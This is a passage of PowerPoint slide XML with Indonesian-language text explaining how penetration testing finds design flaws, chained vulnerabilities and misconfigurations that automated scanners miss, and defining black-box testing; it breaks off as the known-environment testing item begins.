              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlewatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengkodean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanipulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsionalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimaksudkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cacat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unggul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kotak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>hitam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsultan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsultan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekstensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mensimulasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
